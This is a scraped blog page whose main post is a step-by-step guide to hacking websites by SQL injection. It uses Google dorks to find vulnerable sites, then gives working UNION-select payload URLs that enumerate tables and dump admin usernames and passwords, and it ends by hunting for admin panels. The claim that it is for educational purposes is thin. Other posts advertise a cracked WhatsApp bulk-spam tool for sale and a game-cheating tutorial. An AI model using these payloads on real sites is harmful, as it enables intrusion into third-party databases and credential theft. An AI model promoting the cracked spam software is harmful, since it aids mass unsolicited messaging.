]

Create Free Custom Logo Designs - DesignEvo

DesignEvo is a free online logo maker with 3000+ templates that anyone can use to bring to life a compelling, unique logo in minutes.

Battlefield 2 Windows Game Play | Complete Collection

In Battlefield 2, players chose to fight for one of three military superpowers: the United States, the Chinese, or the newly formed Middle East Coalition. Armed with the latest modern weaponry, players took control of any of the game’s 30+ vehicles to engage in major conflicts with over 64 players in some of the largest online battles on the PC.

Traffic Nation: Street Drivers Android Game Play

Race through traffic in brand new endless racing game with realistic physics! Earn Reputation and Money, buy better cars, rims, vinyls and ultimately experience endless racing. Avoid cops, get extra bonus and become living legend in League of Racers! Want a camaro or chevy? Tune your car with rims and vynil wraps. Pimp your ride with upgrades! There's one rule: be fast!

Top Boat: Racing Simulator 3D Android Game Play

Drive the fastest ocean-going powerboats in this exciting ultimate racing game!

Counter Assault Forces Android Game Play

Counter Assault Forces lets you experience the real shooting adrenaline with its stunning graphics, easy controls, realistic weapons and awesome locations!Play this great FPS game: strike your enemies, protect the hostages and unlock new guns! Become the best soldier in the world, Get Counter Assault Forces Now!

Showing posts with label Ethical Hacking. Show all posts
Showing posts with label Ethical Hacking. Show all posts

Jun 16, 2017

Hacking website using SQL Injection -step by step guide

Before we see what  SQL Injection is. We should know what SQL and Database are.

Database:

Database is collection of data. In website point of view, database is used for storing user ids,passwords,web page details and more.


Some List of Database are:


* DB servers,
* MySQL(Open source),
* MSSQL,
* MS-ACCESS,
* Oracle,
* Postgre SQL(open source),
* SQLite,


SQL:

Structured Query Language is Known as SQL. In order to communicate with the Database ,we are using SQL query. We are querying the database so it is called as Query language.

Definition from Complete reference:


SQL is a tool for organizing, managing, and retrieving data stored by a computer
database. The name “SQL” is an abbreviation for Structured Query Language. For
historical reasons, SQL is usually pronounced “sequel,” but the alternate pronunciation
“S.Q.L.” is also used. As the name implies, SQL is a computer language that you use to
interact with a database. In fact, SQL works with one specific type of database, called a
relational database.

Simple Basic Queries for SQL:


Select * from table_name :
this statement is used for showing the content of tables including column name.
For eg:
select * from users;

Insert into table_name(column_names,…) values(corresponding values for columns):
For inserting data to table.
For eg:
insert into users(username,userid) values(“BreakTheSec”,”break”);

I will give more detail and query in my next thread about the SQL QUERY.

What is SQL Injection?

SQL injection is Common and famous method of hacking at present . Using this method an unauthorized person can access the database of the website. Attacker can get all details from the Database.


What an attacker can do?

* ByPassing Logins
* Accessing secret data
* Modifying contents of website
* Shutting down the My SQL server


Now let’s dive into the real procedure for the SQL Injection.
Follow my steps.

Step 1: Finding Vulnerable Website:

Our best partner for SQL injection is Google. We can find the Vulnerable websites(hackable websites) using Google Dork list. google dork is searching for vulnerable websites using the google searching tricks. There is lot of tricks to search in google. But we are going to use “inurl:” command for finding the vulnerable websites.


Some Examples:

inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=

Here is the huge list of Google Dork
http://www.ziddu.com/download/13161874/A…t.zip.html

How to use?

copy one of the above command and paste in the google search engine box.
Hit enter.
You can get list of web sites.
We have to visit the websites one by one for checking the vulnerability.
So Start from the first website.





Note:if you like to hack particular website,then try this:
site:www.victimsite.com dork_list_commands
for eg:

site:www.victimsite.com inurl:index.php?id=
 Step 2: Checking the Vulnerability:
Now we should check the vulnerability of websites. In order to check the vulnerability ,add the single quotes(‘) at the end of the url and hit enter. (No space between the number and single quotes)

For eg:

http://www.victimsite.com/index.php?id=2'
 If the page remains in same page or showing that page not found or showing some other webpages. Then it is not vulnerable.

If it showing any errors which is related to sql query,then it is vulnerable. Cheers..!!
For eg:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1
Step 3: Finding Number of columns:
Now we have found the website is vulnerable. Next step is to find the number of columns in the table.
For that replace the single quotes(‘) with “order by n” statement.(leave one space between number and order by n statement)

Change the n from 1,2,3,4,,5,6,…n. Until you get the error like “unknown column “.


For eg:

http://www.victimsite.com/index.php?id=2 order by 1
http://www.victimsite.com/index.php?id=2 order by 2
http://www.victimsite.com/index.php?id=2 order by 3
http://www.victimsite.com/index.php?id=2 order by 4
 change the number until you get the error as “unknown column”

if you get the error while trying the “x”th number,then no of column is “x-1”.

I mean:

http://www.victimsite.com/index.php?id=2 order by 1(noerror)
http://www.victimsite.com/index.php?id=2 order by 2(noerror)
http://www.victimsite.com/index.php?id=2 order by 3(noerror)
http://www.victimsite.com/index.php?id=2 order by 4(noerror)
http://www.victimsite.com/index.php?id=2 order by 5(noerror)
http://www.victimsite.com/index.php?id=2 order by 6(noerror)
http://www.victimsite.com/index.php?id=2 order by 7(noerror)
http://www.victimsite.com/index.php?id=2 order by 8(error)

 so now x=8 , The number of column is x-1 i.e, 7.

Sometime the above may not work. At the time add the “–” at the end of the statement.
For eg:

http://www.victimsite.com/index.php?id=2 order by 1--

Step 4: Displaying the Vulnerable columns:

Using “union select columns_sequence” we can find the vulnerable part of the table. Replace the “order by n” with this statement. And change the id value to negative(i mean id=-2,must change,but in some website may work without changing).

Replace the columns_sequence with the no from 1 to x-1(number of columns) separated with commas(,).


For eg:
if the number of columns is 7 ,then the query is as follow:

http://www.victimsite.com/index.php?id=-2 union select 1,2,3,4,5,6,7--
If the above method is not working then try this:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7--
It will show some numbers in the page(it must be less than ‘x’ value, i mean less than or equl to number of columns).

Like this:







Now select 1 number.
It showing 3,7. Let’s take the Number 3.


Step 5: Finding version,database,user
Now replace the 3 from the query with “version()”


For eg:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,version(),4,5,6,7--
It will show the version as 5.0.1 or 4.3. something like this.

Replace the version() with database() and user() for finding the database,user respectively.


For eg:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,database(),4,5,6,7--
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,user(),4,5,6,7--
If the above is not working,then try this:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,unhex(hex(@@version)),4,5,6,7--


Step 6: Finding the Table Name
 if the version is 5 or above. Then follow these steps.  Now we have to find the table name of the database. Replace the 3 with “group_concat(table_name) and add the “from information_schema.tables where table_schema=database()”


For eg:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()--
 Now it will show the list of table names. Find the table name which is related with the admin or user.








Now select the “admin ” table.


if the version is 4 or some others, you have to guess the table names. (user, tbluser).  It is hard and bore to do sql inection with version 4.

Step 7: Finding the Column Name


Now replace the “group_concat(table_name) with the “group_concat(column_name)”

Replace the “from information_schema.tables where table_schema=database()–” with “FROM information_schema.columns WHERE table_name=mysqlchar–

Now listen carefully ,we have to find convert the table name to MySql CHAR() string and replace mysqlchar with that .


Find MysqlChar() for Tablename:
First of all install the HackBar addon:
https://addons.mozilla.org/en-US/firefox/addon/3899/
Now
select sql->Mysql->MysqlChar()

This will open the small window ,enter the table name which you found. i am going to use the admin table name.

click ok

Now you can see the CHAR(numbers separated with commans) in the Hack toolbar.


Copy and paste the code at the end of the url instead of the “mysqlchar”
For eg:

http://www.victimsite.com/index.php?id=-2 and 1=2union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)–
Now it will show the list of columns.
like admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pas ​ s,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password..etc..

Now replace the replace group_concat(column_name) with group_concat(columnname, 0x3a,anothercolumnname).

Columnname should be replaced from the listed column name.
anothercolumnname should be replace from the listed column name.

Now replace the ” from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)” with the “from table_name”

For eg:

http://www.victimsite.com/index.php?id=-2
and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin--
Sometime it will show the column is not found.
Then try another column names

Now it will Username and passwords.

Enjoy..!!cheers..!!

If the website has members then jock-bot for you. You will have the list of usernames and password.
Some time you may have the email ids also,enjoy you got the Dock which can produce the golden eggs.

Step 8: Finding the Admin Panel:
Just try with url like:


http://www.victimsite.com/admin.php
http://www.victimsite.com/admin/
http://www.victimsite.com/admin.html
http://www.victimsite.com:2082/
etc.
If you have luck ,you will find the admin page using above urls. or try this list .
Here is the list of admin urls:

http://www.ziddu.com/download/13163866/A…t.zip.html

Note:
This is just for educational purpose only. Discussing or Reading about thief technique is not crime but implementing.

Nov 7, 2016

BitTorrent Pro - Torrent Android App

BitTorrent Pro - Torrent Android App

Included in the Pro app:
✔ No banner ads
✔ Battery Saver feature- suspends torrents when battery goes below a predefined level
✔ Auto-shutdown feature to save battery + data. Automatically shut down torrenting when downloads are done and app is in background
✔ Introductory pricing

Standard features:
✔ Beautifully simple, clean design
✔ The very latest in core torrenting technology, continuously updated by dedicated core engineers to maximize performance
✔ Beautifully light, clean design
✔ Wifi-only mode to save on mobile data
✔ No speed limits and no size limits
✔ Easy access to your media with integrated music and video libraries
✔ Select files to download within a torrent to minimize your storage footprint
✔ Better listening and viewing experience with integrated music and video players
✔ Choose your file download location
✔ Download torrents and magnet links
✔ Translations in Pусский, Español, Italiano, Português do Brasil
✔ Access torrents with licensed content from BitTorrent’s content partners such as Moby and Public Enemy-- from the get-go

✔ Make your Android device so much more fun




Download Link :- Click Here

Aug 28, 2015

WhatsApp Bulk Sender Unlimited

I was looking for a TOOL/SOFTWARE that could send WhatsApp message to millions of my client, but I could not find exactly what I was looking for.  Some software I found were either too costly or they required monthly licensing or they had various Limitations or worst still the so called software were outright Fakes.

So instead of wasting my time and finances on all these scraps, my friend {a software expert} and myself {an IT guru, INFOPRENEUR, advert magnate} decided to redesign or better still modify one of these software to our taste. This decision we made lead to the BIRTH of a modified WHATSAPP BULK SENDER.

This software is basically the most robust solution available which allows you to send mass WhatsApp Messages with text, image, video, GPS Location & contact files based messages on WhatsApp to hundreds & thousands of WhatsApp users anywhere in the world! All completely free! Well, that’s because you can communicate on WhatsApp for free and our Bulk. WhatsApp Software allows you to broadcast message and reach your prospects & customers WhatsApp Inbox on a mass level only with a click of few buttons.

This software will let you go beyond the normal WhatsApp Messaging limits and allows you to add 100s & 1000s of Bulk WhatsApp Senders which are also known as WhatsApp Channels. That means that you can use the power of Bulk WhatsApp Messaging and start promoting anything on WhatsApp to thousands of numbers in one go.

You can send text messages, images, audio messages, long videos and even vCard information to WhatsApp registered users using our ultimate Bulk WhatsApp Marketing Software which works on any Desktop PC using Windows 7 with .Net 4 Framework installed.

We developed this modified (CRACKED) WhatsApp BULK messaging software to help people reach their clients.

How it works:


– You register your number (Add Sender) with valid password (generated with WART)
– You import a text file with numbers and scan them if they have WhatsApp (scan Receivers), then you export the good ones into a txt file
– You get the numbers from txt file and Paste them into the New Campaign, set your message and a picture (if you want) and click Add Campaign
– You watch in real time the sending of your message and see which numbers got your message

What do you need:

– Valid phone numbers that can get SMS to get verified with WART(its registration module)

What can it do:

– Send messages to other WhatsApp numbers
– Send pictures to other WhatsApp numbers
– Create campaigns and send bulk messages to WhatsApp numbers
– Possibility to validate numbers (check if they have or not WhatsApp) and export the valid numbers

Features and technical details:

– Scan numbers function, you can import a list of numbers and scan all of them and export the good numbers who have WhatsApp
– Live single test message
– You can load unlimited senders
– Campaign management, you can create multiple campaigns and broadcast specific messages and images
– Possibility to see in real time all sending statuses (pending, completed..)
– Options to control the delay between messages in campaigns and many other options

Advantages Of This Modified WhatsApp bulk Software



  • Global Access to All WhatsApp Numbers:With our software there is no limit to how many messages you send messages on WhatsApp. You can open yourself to new markets and reach to any area across the world to market your messages.
  • Send Videos for Free: Our powerful software allows you to upload & message videos on unlimited WhatsApp numbers in your database.
  • Send Images for Free:You can send images & photos in bulk at no extra cost
  • Greater Mobility:You can now send messages on thousands of WhatsApp phone numbers anywhere and anytime via simply an internet connection.
  • Immediate Reply: You can receive instant reply & results over your WhatsApp Marketing campaigns from your potential prospects & customers before you complete sending your messages via our software.
  • Save Money: You can save a lot of money that you traditional spend on limited character based SMS Services & Panels.
  • Global Marketing at Less Price: You can literally message anyone in the world just that they are having WhatsApp installed on their cell phone.


HOW CAN YOU PURCHASE THIS SOFTWARE……BY CONTACTING ME    
Contact me on
Email:ijaskalikavu@gmail.com                                                                              

Contact Me: Ijaz ahamed
Follow the instruction there….
Not sure if our WhatsApp Marketing Solution & System will work for your type of business? Why don’t you take a trial and see what kind of response do you get!
 **NOTE: Use it only for personal purposes, WE don’t encourage sending messages to strangers, NO SPAM **

Aug 23, 2015

Subway Surfers Hack (Unlimted Coins) - Hack any Android Game

Hello Friends I am Back with an awesome tutorial for You  which is very Easy . You can Easily Hack anyAndroid Game Using this Tutorial and that is very easy to do.  In this Tutorial , I Hack Subway Surfers Game for making you understand how to Hack Any Android Game and Get Unlimited Coins, Gems , Score,Keys etc. Their may be many reason you want to hack an Android Game like if you want to play more levels and it takes too much time to collect coins or you want to Impress your Friends . This Tutorial is Safe , scam free and you don't need to download subway surfers hack apk ,subway surfers hack apk or anything Like this . Also CheckFree Recharge Tricks
Subway-surfers-hack

Read the Full tutorial Carefully to get Subway Surfers Unlimited Coins also I created a Video Tutorial for you to make you Understand . You must watch the Video (Given at last) .

How to Hack Subway Surfers or Any Android Game

 It is very Easy to Hack any Android Game and Get Unlimited Coins . All you need is a Rooted Android Device (You can use Framaroot to root your Android Device in One click) and 5 minutes to Hack any Android Gamelike Subway surfers , Temple Run , Candy Crush Saga , Dr. Driving etc. Read the below given Steps to Hack Subway Surfers .

1. Firstly, You have to Download Game Killer Android Application and Install it 
    (Game Killer Application is not Available on Play Store , You can Download it using below Link)

Download Gamekiller
 
2. After Installing Game Killer Successfully , Open it and Minimize it . (Gamekiller Icon will Appear on your Screen)
3. Now Open the Game you want to Hack . I am taking example of Subway surfers.
4. Now Play the Game and Collect some Coins (10-20  coins are Enough) and Collecting Kill yourself in game
5. Now Tap on Game killer Icon and Enter the Number of coins you have in Search Box and Click Search.
6. It will Show you thousands of Result. Again Minimize Game Killer App and Play the Game again and Collect Some coins Again . 
7 Open Gamekiller and Enter the Total number of Coins you have after Second Play and Click Search.
8. Now It will show you 11-12 Results Only . But you have to Play the Game one More Last time
9. Again Enter the Total No. of Coins in Gamekiller and Search. You will get only 4-5  Results Now .
10. Just Click on All one by one and Change their Value as 99999999 . Change the Value of all Results

Do Read : [Latest]Get Norton Antivirus 2016 free 6 moths license 
Done, Subway Surfers Hack .. You Have Successfully Hack an Popular android Game - Subway Surfers. Play The game and You will see the Magic. Your Coins will be increased Automatically . If you didn't Understand the Above Tutorial , You must Watch the Video Below or Click Here to go to Youtube .

Aug 1, 2015

Ethical Hacking Ebooks Collection

| Ethical Hacking & Gray Hat E-books |

Also Read : New Android App for Free Recharge - Also Earn Rs 30 per Referral
Just Click on any Ebook Name & Download

Here Is the best hacking e books:


Enter your email address: